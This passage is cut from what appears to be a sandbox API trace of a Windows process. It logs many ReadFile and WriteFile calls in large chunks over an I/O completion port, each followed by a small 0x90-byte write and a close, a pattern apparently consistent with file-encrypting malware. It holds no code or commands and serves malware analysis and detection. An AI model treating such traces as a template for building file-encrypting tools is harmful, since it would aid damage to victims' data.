lpOverlapped=0x2aaf9e4) returned 1 [0167.349] WriteFile (in: hFile=0x1b0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.349] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.349] CloseHandle (hObject=0x1ec) returned 1 [0167.351] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.352] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.352] CloseHandle (hObject=0x1b0) returned 1 [0167.353] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0167.356] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.390] ReadFile (in: hFile=0x1a0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0167.391] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.391] WriteFile (in: hFile=0x1a0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x181f4, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.392] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.392] ReadFile (in: hFile=0x1a0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.392] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.392] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.392] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.393] WriteFile (in: hFile=0x1a0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.394] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.394] CloseHandle (hObject=0x1a0) returned 1 [0167.399] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.399] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.542] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 1 [0167.543] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.543] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x176e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0167.543] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.543] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0167.543] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.543] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.543] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.543] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2690020) returned 1 [0167.544] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.544] CloseHandle (hObject=0x1d0) returned 1 [0167.563] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0167.567] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.744] ReadFile (in: hFile=0x1b0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 1 [0167.744] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.744] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 1 [0167.874] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.874] ReadFile (in: hFile=0x1f4, lpBuffer=0x3710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3710020) returned 1 [0167.909] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.909] ReadFile (in: hFile=0x1c0, lpBuffer=0x3830124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3830020) returned 1 [0167.974] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.975] WriteFile (in: hFile=0x1b0, lpBuffer=0x710124*, nNumberOfBytesToWrite=0xc01b, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.975] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.975] ReadFile (in: hFile=0x194, lpBuffer=0x3950124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3950020) returned 1 [0167.975] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.975] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3a70020) returned 1 [0167.976] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.976] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x1767e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.976] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.977] ReadFile (in: hFile=0x1c8, lpBuffer=0x3b90124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3b90020) returned 1 [0167.977] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.977] WriteFile (in: hFile=0x1f4, lpBuffer=0x3710124*, nNumberOfBytesToWrite=0x10a32, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3710020) returned 1 [0167.977] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.977] ReadFile (in: hFile=0x1c4, lpBuffer=0x3cb0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3cb0020) returned 1 [0167.978] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.978] WriteFile (in: hFile=0x1c0, lpBuffer=0x3830124*, nNumberOfBytesToWrite=0x1865f, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3830020) returned 1 [0167.979] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.979] ReadFile (in: hFile=0x1b0, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.979] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.979] WriteFile (in: hFile=0x194, lpBuffer=0x3950124*, nNumberOfBytesToWrite=0x13d2c, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3950020) returned 1 [0167.980] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.980] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a70124*, nNumberOfBytesToWrite=0x8747, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a70020) returned 1 [0167.980] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.980] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0167.980] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.980] WriteFile (in: hFile=0x1c8, lpBuffer=0x3b90124*, nNumberOfBytesToWrite=0x751e, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b90020) returned 1 [0167.981] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.981] ReadFile (in: hFile=0x1f4, lpBuffer=0x3710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3710020 | out: lpBuffer=0x3710124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3710020) returned 0x0 [0167.981] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.981] WriteFile (in: hFile=0x1c4, lpBuffer=0x3cb0124*, nNumberOfBytesToWrite=0x16716, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3cb0020) returned 1 [0167.981] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.981] ReadFile (in: hFile=0x1c0, lpBuffer=0x3830124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3830020) returned 0x0 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.982] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.982] ReadFile (in: hFile=0x194, lpBuffer=0x3950124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3950020 | out: lpBuffer=0x3950124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3950020) returned 0x0 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.982] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3a70020) returned 0x0 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.982] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.982] ReadFile (in: hFile=0x1c8, lpBuffer=0x3b90124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3b90020) returned 0x0 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.982] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3710020) returned 1 [0167.982] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.983] ReadFile (in: hFile=0x1c4, lpBuffer=0x3cb0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3cb0020) returned 0x0 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.983] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3830020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.983] WriteFile (in: hFile=0x1b0, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x710020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.983] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3950020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.983] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a70020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.983] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x2b70020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.983] PostQueuedCompletionStatus (CompletionPort=0x130, 